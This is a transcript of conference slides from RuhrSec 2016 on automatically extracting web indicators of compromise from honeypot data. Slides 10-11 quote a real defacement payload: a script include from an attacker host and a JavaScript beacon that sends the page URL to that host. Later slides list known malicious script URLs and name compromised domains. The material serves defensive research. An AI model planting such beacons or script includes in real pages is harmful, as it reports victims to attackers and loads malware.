automatic extraction of indicators of compromise for web applications (ruhrsec 2016)
TRANSCRIPT
![Page 1: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/1.jpg)
Automatic Extraction of Indicators of Compromise for Web Apps
Dr.-Ing. Marco Balduzzi(with D. Balzarotti and O. Catakoglu @ WWW'16)
29th April 2016RuhrSec, Bochum
![Page 2: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/2.jpg)
2
Who am I?
Sr. Research Scientist @ Trend Micro
Forward-Looking Threat Research (FTR) team
M.Sc. + Ph.D.
UniBG + iSecLab@EURECOM
Hackish and open-source enthusiast since 2002
Established presence in international conferences and committees
![Page 3: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/3.jpg)
3
Indicators of Compromise (IOCs)
Used in incident response and computer forensics
Forensic artifacts
A system has been compromised or infected with malware
For example
Presence in Windows Registry
MD5 file in temporary directory
Unusual outbound network traffic
Log-in irregularities and failures
![Page 4: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/4.jpg)
4
Topic of presentation
Extend the concept of IOCs to Web Applications
(& automatically detect them!)
![Page 5: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/5.jpg)
5
![Page 6: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/6.jpg)
6
![Page 7: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/7.jpg)
7
![Page 8: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/8.jpg)
8
A simple observation
When compromising a web application, attackers often rely on external content / accessory scripts
Are not necessarily per se malicious
Popular Javascript libraries, e.g. jQuery
Beautifiers that control the look&feel of the page, e.g. matrix-style background
Scripts that implement reusable functions, e.g. browsers fingerprinting
Their innocuous form make them “highly resilient” to traditional detection systems (scanners)
![Page 9: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/9.jpg)
9
BUT…
Their presence can be used to precisely pinpoint compromised or harmful pages
(a Web Indicator of Compromise)
![Page 10: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/10.jpg)
10
Example: r57 hacking group
...<head><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html;charset=windows-1252"><title>4Ri3 60ndr0n9 was here </title><SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT>...
![Page 11: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/11.jpg)
11
Example: r57 hacking group
...<head><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html;charset=windows-1252"><title>4Ri3 60ndr0n9 was here </title><SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>...
a=new/**/Image();a.src='http://www.r57.gen.tr/r00t/yaz.php?a='+ escape(location.href);
![Page 12: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/12.jpg)
12
![Page 13: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/13.jpg)
13
How do we know that a script is used
in a malicious context ?
i.e. “Is a valid IOC”
![Page 14: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/14.jpg)
14
Data Collection
High-interaction web honeypot [1]
[1] Canali, D., and Balzarotti, D. Behind the scenes of online attacks: an analysis of exploitation behaviors on the web.
![Page 15: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/15.jpg)
15
Extraction of Candidates
Automatically extract candidates from files uploaded and modified by attackers
Focus on JavaScript URLs
Can be applied to other resource types
Normally benign!
E.g., Blocking mouse right-click. Used by attackers to prevent page inspection
Content agnostic (impossible to tell)
Need to extend the analysis to the context
![Page 16: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/16.jpg)
16
Searching the Web for Indicators
Public web pages including references to our indicators
Google did not help :(
Only indexes the content (intext:)
Meanpath.com
HTML/JS source-code support
Coverage of 200 million websites
![Page 17: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/17.jpg)
17
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
![Page 18: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/18.jpg)
18
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
![Page 19: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/19.jpg)
19
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
Anomalous Origin
![Page 20: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/20.jpg)
20
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
Anomalous Origin
Component Popularity
![Page 21: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/21.jpg)
21
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
Anomalous Origin
Component Popularity
Security Forums
![Page 22: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/22.jpg)
22
Experiments
Training data: Jan 2015 → April 2015
375 unique candidates (over a total of 2,765)
Population of 1 to 202 (manual vs automated attacks)
Clustering: unsupervised learning (k-means)
Weka framework
3 cluster categories: malicious, benign, undecided
Live experiment: May 2015 → August 2015 (4 months)
Automated detection via analysis framework
![Page 23: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/23.jpg)
23
Live Experiment
303 unique candidates (2.5/day)
Automatically processed and assigned to the closed cluster
22 Benign indicators
96 Malicious indicators
90% were previously unknown or misclassified
¼ IOCs → visual effects: moving text, snow
185 insufficient information (rare scripts)
![Page 24: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/24.jpg)
24
High Lifetime of Malicious Indicators
![Page 25: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/25.jpg)
25
Use of trustworthy code-repositories
10% IOCs hosted on Google Drive/Code!
1 was online for over 2 years!
Last month: used in dozens of defaced websites and drive-by
![Page 26: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/26.jpg)
26
Web Shells
Often deployed by attackers and hidden in defaced websites
Cases of password-protected logins [1]
Flagged as valid indicator
Cases of the r57shell script: feedback of defaced domains
[1] http://www.lionsclubmalviyanagar.com and http://www.wartisan.com
![Page 27: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/27.jpg)
27
Phishing
Common habit
Webmail portals of AOL and Yahoo
Reused the original JS files and hosted on the authoritative domain [1]
IOC included in pages hosted on different domains
Websites compromised by the same group [2]
Correctly classified as malicious indicator
[1] http://snsstatic.aolcdn.com/sns.v14r8/js/fs.js [2] http://www.ucylojistik.com/ and http://fernandanunes.com/
![Page 28: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/28.jpg)
28
VisAdd Adware Campaign
http://4x3zy4qll8bu4n1j.netdnassl.com/res/helper.min.js
Installed on defaced webpages
TDS for affiliate programs
A.Visadd.com malware
Loads the same JS at client-side
600+ new infected users per day
![Page 29: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/29.jpg)
29
Fake Charity Program
http://static.donationtools.org/widgets/FoxyLyrics/widget.js
Loaded via BHO in IE
Vittalia and BrowseFox malware
594 new infections per day
![Page 30: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/30.jpg)
30
Mailers
Compromised sites [1] → SPAM mailing server
Alternative to BHS and botnet-infected machines
Use of Pro Mailer V2: PHP mailer
Copies of jQuery hosted on Google and Tumblr
Unmodified copies of popular libraries. Very likely classified as benign by traditional scanners
Malicious use detected.
[1] http://www.senzadistanza.it/ and http://www.hprgroup.biz/
![Page 31: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/31.jpg)
31
Limitations
Our approach relies on the attacker's deployment strategy and is content agnostic
Evasion techniques:
Inline code
One-time generated URLs
![Page 32: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/32.jpg)
32
Conclusions
Introduced the concept of Web IOCs
Leveraged a honeypot for real-time identification
Benign content → undetected by traditional scanners
Use 'HTTP Referer' to discover compromises pages
By the same hacking group?
![Page 33: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)](https://reader031.vdocuments.site/reader031/viewer/2022022414/587866471a28ab18098b75f9/html5/thumbnails/33.jpg)
33
Thank you!
Dr.-Ing. Marco Balduzzi
@embyte